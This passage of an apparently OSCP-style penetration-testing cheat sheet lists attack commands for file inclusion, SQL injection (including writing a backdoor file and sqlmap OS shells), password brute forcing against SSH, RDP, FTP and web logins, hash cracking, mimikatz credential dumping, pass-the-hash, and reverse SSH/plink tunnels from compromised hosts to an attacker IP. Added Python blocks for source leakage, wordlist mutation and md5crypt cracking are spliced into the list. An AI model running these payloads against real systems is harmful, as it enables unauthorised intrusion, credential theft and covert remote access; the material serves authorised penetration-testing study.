1698 | code taking user-controlled input.
1699 | `include("lang/".$_COOKIE['lang']);`
1700 | `include($_GET['page'].".php");`
1701 |
1702 | - LFI - Encode and Decode a file using base64. The php://filter wrapper returns the included file's source base64-encoded instead of executing it; grep picks out the long unbroken run and base64 -d restores the file
1703 |
1704 | curl -s "http://$ip/?page=php://filter/convert.base64-encode/resource=index" | grep -e '[^ ]\{40,\}' | base64 -d
1706 |
1707 | - LFI - Download file with base 64 encoding
1708 | http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
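The php://filter trick above, as an added Python example that is not part of the original guide: it builds the filter URL, pulls the base64 run out of the HTML that surrounds it (the job the grep does in the curl pipeline) and decodes it, with two checks a script should add: tolerate stripped padding, and confirm the result really is PHP source rather than some other long alphanumeric run. The PHP source and the response page are constructed for the example; the `filter_url` helper and the 40-character threshold are this example's choices.

```python
"""Added example, not from the original guide: extract and decode the base64
that php://filter/convert.base64-encode leaks through an LFI."""
import base64
import binascii
import re

# Constructed sample: the PHP source an include would leak, and a fake page
# whose navigation HTML surrounds the base64 blob like a real response does.
LEAKED_SOURCE = (
    b"<?php\n"
    b"$db_user = 'webapp';\n"
    b"$db_pass = 'S3cr3tP@ss';\n"
    b"include($_GET['page'] . \".php\");\n"
    b"?>\n"
)
SAMPLE_RESPONSE = (
    "<html><body><div id='menu'>Home | About | Contact</div>\n"
    + base64.b64encode(LEAKED_SOURCE).decode()
    + "\n<div id='footer'>(c) example</div></body></html>\n"
)

# Same idea as the guide's grep for 40+ non-space characters, restricted to the
# base64 alphabet so navigation text and attribute names are not matched.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def filter_url(base_url, param, resource):
    """URL for the php://filter trick. Give 'resource' without .php when the
    vulnerable include appends the extension itself."""
    return (f"{base_url}?{param}=php://filter/convert.base64-encode/"
            f"resource={resource}")


def extract_leaked_source(html):
    """Decode the longest base64 run in the response; None if there is none or
    it does not decode cleanly."""
    runs = B64_RUN.findall(html)
    if not runs:
        return None
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped '=' padding
    try:
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_php(source):
    """Cheap check that what we decoded is source, not a minified asset."""
    return source is not None and source.lstrip().startswith(b"<?php")


if __name__ == "__main__":
    print(filter_url("http://10.10.10.5/index.php", "page", "index"))
    src = extract_leaked_source(SAMPLE_RESPONSE)
    print(src.decode() if looks_like_php(src) else "no PHP source found")
```

In practice `SAMPLE_RESPONSE` is replaced by the body returned for `filter_url(...)`; if `looks_like_php` is false, the include probably did not append `.php`, so retry with the full file name as the resource.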
1709 |
1710 | - LFI Linux Files:
1711 | /etc/issue
1712 | /proc/version
1713 | /etc/profile
1714 | /etc/passwd
1715 | /etc/shadow
1716 | /root/.bash_history
1717 | /var/log/dmesg
1718 | /var/mail/root
1719 | /var/spool/cron/crontabs/root
1721 |
1722 | - LFI Windows Files:
1723 | %SYSTEMROOT%\repair\system
1724 | %SYSTEMROOT%\repair\SAM
1725 | %WINDIR%\win.ini
1726 | %SYSTEMDRIVE%\boot.ini
1727 | %WINDIR%\Panther\sysprep.inf
1728 | %WINDIR%\system32\config\AppEvent.Evt
1730 |
1731 | - LFI OSX Files:
1732 | /etc/fstab
1733 | /etc/master.passwd
1734 | /etc/resolv.conf
1735 | /etc/sudoers
1736 | /etc/sysctl.conf
1737 |
1738 | - LFI - Download passwords file
1739 | http://$ip/index.php?page=/etc/passwd
1740 | http://$ip/index.php?file=../../../../etc/passwd
1741 |
1742 | - LFI - Download passwords file with filter evasion (URL-encoded slashes)
1743 | http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
1744 |
1745 | - Local File Inclusion - In PHP versions below 5.3.4 a %00 (null byte)
1746 | terminates the path, so an extension the code appends (".php") is ignored
1747 | GET
1748 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1749 |
1750 | - Contaminating Log Files - write PHP into a log the application can reach (for example via the User-Agent header or the request path, which land in the Apache access log, or an invalid SSH login name, which lands in auth.log) and then include that log file through the LFI.
1751 |
1752 | - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini
1753 | file must be configured to allow remote files
1754 |
1755 | */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
1756 |
1757 | `include($_REQUEST["file"].".php");`
1758 |
1759 | - Remote File Inclusion
1760 |
1761 | `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
1762 |
1764 |
1765 | - Database Vulnerabilities
1766 | ----------------------------------------------------------------------------------------------------------------------
1767 |
1768 | - Grab password hashes from a web application MySQL database called "Users" - once you have the MySQL root username and password
1769 |
1770 | mysql -u root -p -h $ip
1771 | use Users;
1772 | show tables;
1773 | select * from users;
1774 |
1775 | - Authentication Bypass (the WHERE clause after injecting `wronguser' or 1=1` into the username field; with LIMIT 1 the first row, usually the admin, is returned)
1776 |
1777 | name='wronguser' or 1=1;
1778 | name='wronguser' or 1=1 LIMIT 1;
1779 |
1780 | - Enumerating the Database
1781 |
1782 | `http://192.168.11.35/comment.php?id=738)'`
1783 |
1784 | Verbose error message?
1785 |
1786 | `http://$ip/comment.php?id=738 order by 1`
1787 |
1788 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 `
1789 |
1790 | Determine MySQL Version:
1791 |
1792 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 `
1793 |
1794 | Current user being used for the database connection:
1795 |
1796 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `
1797 |
1798 | Enumerate database tables and column structures
1799 |
1800 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables `
1801 |
1802 | Target the users table in the database
1803 |
1804 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' `
1805 |
1806 | Extract the name and password
1807 |
1808 | `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users `
1809 |
1810 | Create a backdoor
1811 |
1812 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`
1813 |
1814 |
1815 | - **SQLMap Examples**
1816 |
1817 | - Crawl the links
1818 |
1819 | `sqlmap -u http://$ip --crawl=1`
1820 |
1821 | `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
1822 |
1823 |
1824 | - SQLMap Search for databases against a suspected GET SQL Injection
1825 |
1826 | `sqlmap -u "http://$ip/blog/index.php?search=" --dbs`
1827 |
1828 | - SQLMap dump tables from database oscommerce at GET SQL injection
1829 |
1830 | `sqlmap -u "http://$ip/blog/index.php?search=" --dbs -D oscommerce --tables --dump`
1831 |
1832 | - SQLMap GET Parameter command
1833 |
1834 | `sqlmap -u "http://$ip/comment.php?id=738" --dbms=mysql --dump --threads=5`
1835 |
1836 | - SQLMap Post Username parameter
1837 |
1838 | `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all`
1839 |
1840 | - SQL Map OS Shell
1841 |
1842 | `sqlmap -u "http://$ip/comment.php?id=738" --dbms=mysql --os-shell`
1843 |
1844 | `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell`
1845 |
1846 | - Automated sqlmap scan
1847 |
1848 | `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`
1849 |
1850 | - Targeted sqlmap scan: union-based technique only (--technique=U) against a MySQL backend, random User-Agent, dump the data
1851 |
1852 | `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --technique=U --random-agent --dump`
1853 |
1854 | - Test the forms found on a page and enumerate databases (-o turns on sqlmap's optimisation switches)
1855 |
1856 | `sqlmap -o -u http://$ip/index.php --forms --dbs `
1857 |
1858 | `sqlmap -o -u "http://$ip/form/" --forms`
1859 |
1860 | - Sqlmap check form for injection
1861 |
1862 | `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`
1863 |
1864 | - Enumerate databases
1865 |
1866 | `sqlmap --dbms=mysql -u "$URL" --dbs`
1867 |
1868 | - Enumerate tables from a specific database
1869 |
1870 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables `
1871 |
1872 | - Dump table data from a specific database and table
1873 |
1874 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
1875 |
1876 | - Specify parameter to exploit
1877 |
1878 | `sqlmap --dbms=mysql -u "http://www.example.com/?param1=value1&param2=value2" --dbs -p param2 `
1879 |
1880 | - Specify parameter to exploit in 'nice' URIs (exploits param1)
1881 |
1882 | `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `
1883 |
1884 | - Get OS shell
1885 |
1886 | `sqlmap --dbms=mysql -u "$URL" --os-shell`
1887 |
1888 | - Get SQL shell
1889 |
1890 | `sqlmap --dbms=mysql -u "$URL" --sql-shell`
1891 |
1892 | - SQL query
1893 |
1894 | `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
1895 |
1896 | - Use Tor Socks5 proxy
1897 |
1898 | `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
1899 |
1900 |
1901 | - **NoSQLMap Examples**
1902 | You may encounter NoSQL instances like MongoDB in your OSCP journeys (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you automate NoSQL database enumeration.
1903 |
1904 | - NoSQLMap Installation
1905 |
1906 | git clone https://github.com/codingo/NoSQLMap.git
1907 | cd NoSQLMap/
1908 | ls
1909 | pip install couchdb
1910 | pip install pbkdf2
1911 | pip install ipcalc
1912 | python nosqlmap.py --help
1913 |
1914 | - Password Attacks
1915 | --------------------------------------------------------------------------------------------------------------
1916 |
1917 | - AES Decryption
1918 | http://aesencryption.net/
1919 |
1920 | - Convert multiple webpages into a word list
1921 | for x in index about post contact; do curl -s http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt; done
1924 |
1925 | - Or convert html to word list dict
1926 | html2dic index.html.out | sort -u > index-html.dict
1927 |
1928 | - Default Usernames and Passwords
1929 |
1930 | - CIRT
1931 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1932 |
1933 | - Government Security - Default Logins and Passwords for
1934 | Networked Devices
1935 |
1936 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1937 |
1938 | - Virus.org
1939 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1940 |
1941 | - Default Password
1942 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1943 |
1944 | - Brute Force
1945 |
1946 | - Nmap Brute forcing Scripts
1947 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1948 |
1949 | - Nmap Generic auto detect brute force attack
1950 | nmap --script brute -Pn $ip
1951 |
1952 |
1953 | - MySQL nmap brute force attack
1954 | nmap --script=mysql-brute $ip
1955 |
1956 | - Dictionary Files
1957 |
1958 | - Word lists on Kali
1959 | cd /usr/share/wordlists
1960 |
1961 | - Key-space Brute Force
1962 |
1963 | - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1964 |
1965 | - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1966 |
1967 | - crunch 8 8 -t ,@@^^%%%
1968 |
1969 | - Pwdump and Fgdump - Security Accounts Manager (SAM)
1970 |
1971 | - pwdump.exe - attempts to extract password hashes
1972 |
1973 | - fgdump.exe - attempts to kill local antiviruses before
1974 | attempting to dump the password hashes and
1975 | cached credentials.
1976 |
1977 | - Windows Credential Editor (WCE)
1978 |
1979 | - allows one to perform several attacks to obtain clear text
1980 | passwords and hashes
1981 |
1982 | - wce -w
1983 |
1984 | - Mimikatz
1985 |
1986 | - extract plaintext passwords, hashes, PIN codes and Kerberos
1987 | tickets from memory. mimikatz can also perform
1988 | pass-the-hash, pass-the-ticket or build Golden tickets
1989 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
1990 | From metasploit meterpreter (must have SYSTEM level access):
1991 | ```
1991 | meterpreter> load mimikatz
1992 | meterpreter> help mimikatz
1993 | meterpreter> msv
1994 | meterpreter> kerberos
1995 | meterpreter> mimikatz_command -f samdump::hashes
1996 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords
1996 | ```
1997 |
1998 | - Password Profiling
1999 |
2000 | - cewl can generate a password list from a web page
2001 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
2002 |
2003 | - Password Mutating
2004 |
2005 | - John the ripper can mutate password lists
2006 | nano /etc/john/john.conf
2007 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
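The profiling pipeline above (words scraped from the target's web pages, then mutated with rules), as an added Python example that is not part of the original guide: `words_from_html` does what `cewl -m 6` does (visible text only, scripts and styles skipped, minimum length 6), and `mutate` applies a small rule set of the kind `john --rules` applies (case variants, appended digits and symbols, years, simple leet substitution). The HTML is constructed, and the rule set and the default years `2017`/`2018` are this example's own choices, not John's default rules.

```python
"""Added example, not from the original guide: build a targeted wordlist from a
web page and mutate it. The HTML below is constructed for the example."""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """<html><head><title>MegaCorpOne - Nanotechnology Is the Future</title>
<script>var trackingToken = "abcdef123456";</script></head>
<body><h1>Welcome to MegaCorpOne</h1>
<p>Our nanobots and advanced materials division is based in Vancouver.</p>
<p>Contact: Joe Sheer, Chief Executive Officer</p></body></html>"""


class _TextExtractor(HTMLParser):
    """Collect visible text; ignore <script> and <style> bodies like cewl does."""
    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip = False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def words_from_html(html, min_len=6):
    """Unique words of at least min_len characters, in order of first appearance."""
    parser = _TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z][A-Za-z0-9]*", " ".join(parser.chunks))
    return list(dict.fromkeys(w for w in words if len(w) >= min_len))


LEET = str.maketrans("aeios", "43105")   # a->4 e->3 i->1 o->0 s->5


def mutate(word, years=("2017", "2018")):
    """Expand one word with case, suffix, year and leet variants (this example's
    own rule set; john's default rules are larger)."""
    out = [word, word.lower(), word.upper(), word.capitalize()]
    bases = [word] + ([word.capitalize()] if word.capitalize() != word else [])
    for b in bases:
        out += [b + s for s in ("1", "123", "!", "!1")]
        out += [b + y for y in years]
        out.append(b.translate(LEET))
    return list(dict.fromkeys(out))             # de-duplicate, keep order


def build_wordlist(html, min_len=6):
    """Scrape + mutate, the equivalent of cewl piped through john --rules --stdout."""
    out = []
    for w in words_from_html(html, min_len):
        out.extend(mutate(w))
    return list(dict.fromkeys(out))


if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_HTML):
        print(candidate)
```

Feed the output to hydra or john as the `-P` / `--wordlist` file; for a real target replace `SAMPLE_HTML` with fetched page bodies, one call per page, and union the results.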
2008 |
2009 | - Medusa
2010 |
2011 | - Medusa, initiated against an htaccess protected web
2012 | directory
2013 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
2014 |
2015 | - Ncrack
2016 |
2017 | - ncrack (from the makers of nmap) can brute force RDP
2018 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
2019 |
2020 | - Hydra
2021 |
2022 | - Hydra brute force against SNMP
2023 | `hydra -P password-file.txt -v $ip snmp`
2024 |
2025 | - Hydra FTP known user and password list
2026 | `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
2027 |
2028 | - Hydra SSH using list of users and passwords
2029 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh`
2030 |
2031 | - Hydra SSH using a known password and a username list
2032 | `hydra -v -V -u -L users.txt -p "[known_password]" -t 1 $ip ssh`
2033 |
2034 | - Hydra SSH Against Known username on port 22
2035 | `hydra $ip -s 22 ssh -l [username] -P big_wordlist.txt`
2036 |
2037 | - Hydra POP3 Brute Force
2038 | `hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V`
2039 |
2040 | - Hydra SMTP Brute Force
2041 | `hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V`
2042 |
2043 | - Hydra attack http get 401 login with a dictionary
2044 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
2045 |
2046 | - Hydra attack Windows Remote Desktop with rockyou
2047 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
2048 |
2049 | - Hydra brute force a Wordpress admin login
2050 | `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'`
2051 |
2052 |
2053 |
2054 | - Password Hash Attacks
2055 | -------------------------------------------------------------------------------------------------------------------
2056 |
2057 | - Online Password Cracking
2058 | [*https://crackstation.net/*](https://crackstation.net/)
2059 |
2060 | - Hashcat
2061 | Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
2062 | apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev
2063 | and
2064 | apt-get install pocl-opencl-icd
2065 |
2066 | Cracking Linux Hashes - /etc/shadow file
2067 | ```
2068 | 500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2069 | 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
2070 | 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
2071 | 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
2072 | ```
2073 | Cracking Windows Hashes
2074 | ```
2075 | 3000 | LM | Operating-Systems
2076 | 1000 | NTLM | Operating-Systems
2077 | ```
2078 | Cracking Common Application Hashes
2079 | ```
2080 | 900 | MD4 | Raw Hash
2081 | 0 | MD5 | Raw Hash
2082 | 5100 | Half MD5 | Raw Hash
2083 | 100 | SHA1 | Raw Hash
2084 | 10800 | SHA-384 | Raw Hash
2085 | 1400 | SHA-256 | Raw Hash
2086 | 1700 | SHA-512 | Raw Hash
2087 | ```
2088 |
2089 | Create a .hash file with all the hashes you want to crack
2090 | puthasheshere.hash:
2091 | ```
2092 | $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
2093 | ```
2094 |
2095 | Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
2096 |
2097 | `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
2098 |
2099 | Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
2100 |
2101 | Wordpress clear text: test
2102 |
2103 | Hashcat example cracking Wordpress passwords using rockyou:
2104 |
2105 | `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
2106 |
2107 | - Sample Hashes
2108 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
2109 |
2110 | - Identify Hashes
2111 |
2112 | `hash-identifier`
2113 |
2114 | - To crack linux hashes you must first unshadow them:
2115 |
2116 | `unshadow passwd-file.txt shadow-file.txt `
2117 | `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
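As an added example, not part of the original guide, here is what `unshadow` does (it copies the hash from the shadow file into the second field of each passwd entry so john has both the account and the hash on one line) and what hashcat mode 500 actually computes: md5crypt, the `$1$` scheme of the sample hash above, implemented in pure Python after the original FreeBSD algorithm and used for a small dictionary attack. The passwd and shadow lines are constructed, and the shadow hashes are generated by the block's own `md5crypt` (the salt `O3JMY.Tw` is the one in the sample hash above). It is for understanding the format; hashcat and john remain the tools for real cracking.

```python
"""Added example, not from the original guide: unshadow + md5crypt ($1$, hashcat
mode 500) dictionary attack in pure Python. All sample data is constructed."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, length):
    """crypt(3)'s base-64 variant: 6 bits per char, least significant first."""
    out = ""
    for _ in range(length):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD/GNU md5crypt: the $1$ hash found in /etc/shadow (hashcat -m 500)."""
    pw = password.encode()
    salt = salt[:8]                      # salt is at most 8 characters
    sb = salt.encode()
    ctx = hashlib.md5(pw + b"$1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, remaining)])
    i = len(pw)
    while i:                             # one byte per bit of the password length
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):                # the deliberate slow-down loop
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sb)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    out = ""
    for a, b, c_ in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c_], 4)
    out += _to64(final[11], 2)
    return f"$1${salt}${out}"


# Constructed /etc/passwd and /etc/shadow; the shadow hashes are made here.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
haxzor:x:1001:1001::/home/haxzor:/bin/bash
"""
SAMPLE_SHADOW = "\n".join([
    "root:" + md5crypt("toor", "O3JMY.Tw") + ":17434:0:99999:7:::",
    "daemon:*:17434:0:99999:7:::",
    "haxzor:" + md5crypt("Summer2017", "ab.Cd1/2") + ":17434:0:99999:7:::",
])
WORDLIST = ["password", "123456", "toor", "Summer2017", "letmein"]


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): the shadow hash replaces the 'x' in passwd field 2."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        fields = line.split(":")
        if fields[1] == "x" and fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def crackable(merged):
    """{user: hash} for entries with a real hash; '*', '!' and empty mean no login."""
    out = {}
    for line in merged:
        user, h = line.split(":")[:2]
        if h and h != "x" and not h.startswith(("*", "!")):
            out[user] = h
    return out


def crack_md5crypt(hash_str, wordlist):
    """Dictionary attack on one $1$salt$digest hash; returns the password or None."""
    magic, salt, _digest = hash_str[1:].split("$", 2)
    if magic != "1":
        raise ValueError("not a $1$ md5crypt hash")
    for word in wordlist:
        if md5crypt(word, salt) == hash_str:
            return word
    return None


if __name__ == "__main__":
    for user, h in crackable(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)).items():
        print(f"{user}: {h} -> {crack_md5crypt(h, WORDLIST)}")
```

The 1000-round loop is why md5crypt is roughly a thousand times slower per guess than raw MD5 (hashcat mode 0); sha512crypt (`$6$`, mode 1800) defaults to 5000 rounds, which is why the hashcat table above lists them under different modes and why the same wordlist takes far longer there.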
2118 |
2119 | - John the Ripper - Password Hash Cracking
2120 |
2121 | - `john $ip.pwdump`
2122 |
2123 | - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`
2124 |
2125 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
2126 |
2127 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`
2128 |
2129 | - JTR forced descrypt cracking with wordlist
2130 |
2131 | `john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`
2132 |
2133 | - JTR forced descrypt brute force (incremental mode is the default when no wordlist is given), then show what was cracked
2134 |
2135 | `john --format=descrypt hash.txt`
2135 | `john --format=descrypt hash.txt --show`
2136 |
2137 | - Passing the Hash in Windows
2138 |
2139 | - Use Metasploit to exploit one of the SMB servers in the labs.
2140 | Dump the password hashes and attempt a pass-the-hash attack
2141 | against another system:
2142 |
2143 | `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
2144 |
2145 | `pth-winexe -U administrator //$ip cmd`
2146 |
2147 | Networking, Pivoting and Tunneling
2148 | ================================================================================================================================
2149 |
2150 | - Port Forwarding - accept traffic on a given IP address and port and
2151 | redirect it to a different IP address and port
2152 |
2153 | - `apt-get install rinetd`
2154 |
2155 | - `cat /etc/rinetd.conf `
2156 | `# bindaddress bindport connectaddress connectport `
2157 | `w.x.y.z 53 a.b.c.d 80`
2158 |
2159 | - SSH Local Port Forwarding: supports bi-directional communication
2160 | channels
2161 |
2162 | - `ssh -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]`
2164 |
2165 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on
2166 | an internal non routable network
2167 |
2168 | - `ssh -R [remote_port]:[local_host]:[local_port] [user]@[ssh_server]`
2170 |
2171 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
2172 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
2173 | network on ANY PORT
2174 |
2175 | - `ssh -D [local_port] -p [ssh_port] [user]@[ssh_server]`
2177 |
2178 | - Proxychains - Perform nmap scan within a DMZ from an external
2179 | computer
2180 |
2181 | - Create reverse SSH tunnel from Popped machine on :2222
2182 |
2183 | `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
2184 | `ssh -f -N -R 2222:[local_host]:22 root@[your_public_host]`
2185 |
2186 | - Create a Dynamic application-level port forward on 8080 thru
2187 | 2222
2188 |
2189 | `ssh -f -N -D [bind_address]:8080 -p 2222 hax0r@[host_with_the_2222_listener]`
2190 |
2191 | - Leverage the SSH SOCKS server to perform Nmap scan on network
2192 | using proxy chains
2193 |
2194 | `proxychains nmap --top-ports=20 -sT -Pn $ip/24`
2195 |
2196 | - HTTP Tunneling
2197 |
2198 | `nc -vvn $ip 8888`
2199 |
2200 | - Traffic Encapsulation - Bypassing deep packet inspection
2201 |
2202 | - http tunnel
2203 | On server side:
2204 | `sudo hts -F [local_host]:[service_port] 80`
2205 | On client side:
2206 | `sudo htc -P [proxy_host]:[proxy_port] -F [local_port] [server_host]:80` (combine with stunnel to encrypt the tunnelled traffic)
2207 |
2208 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
2209 | network
2210 |
2211 | - Tunnel on port 22
2212 |
2213 | `plink -l root -pw pass -R 3389:[rdp_host]:3389 [attacker_ip]` ([rdp_host] is 127.0.0.1 for the popped machine's own RDP)
2214 |
2215 | - Port 22 blocked? Try port 80? or 443?
2216 |
2217 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:[rdp_host]:3389 -P 80 [attacker_ip]`
2218 |
2219 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
2220 | (bypass deep packet inspection)
2221 |
2222 | - Windows machine add required firewall rules without prompting the user
2223 |
2224 | - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
2225 |
2226 | - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
2227 |
2228 | - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`
2229 |
2230 | - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
2231 |
2232 | - Start the http tunnel client
2233 |
2234 | `httptunnel_client.exe`
2235 |
2236 | - Create HTTP reverse shell by connecting to localhost port 3000
2237 |
2238 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:[rdp_host]:3389 -P 3000 localhost`
2239 |
2240 | - VLAN Hopping
2241 |
2242 | ```
2242 | git clone https://github.com/nccgroup/vlan-hopping.git
2242 | cd vlan-hopping
2243 | chmod 700 frogger.sh
2244 | ./frogger.sh
2244 | ```
2245 |
2246 |
2247 | - VPN Hacking
2248 |
2249 | - Identify VPN servers:
2250 | `./udp-protocol-scanner.pl -p ike $ip`
2251 |
2252 | - Scan a range for VPN servers:
2253 | `./udp-protocol-scanner.pl -p ike -f ip.txt`
2254 |
2255 | - Use IKEForce to enumerate or dictionary attack VPN servers:
2256 |
2257 | `pip install pyip`
2258 |
2259 | `git clone https://github.com/SpiderLabs/ikeforce.git `
2260 |
2261 | Perform IKE VPN enumeration with IKEForce:
2262 |
2263 | `./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic `
2264 |
2265 | Bruteforce IKE VPN using IKEForce:
2266 |
2267 | `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `
2268 | Use ike-scan to capture the PSK hash:
2269 |
2270 | `ike-scan
2271 | ike-scan TARGET-IP
2272 | ike-scan -A TARGET-IP
2273 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
2274 | ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP`
2275 | Use psk-crack to crack the PSK hash
2276 |
2277 | `psk-crack hash-file.txt
2278 | psk-crack
2279 | psk-crack -b 5 TARGET-IPkey
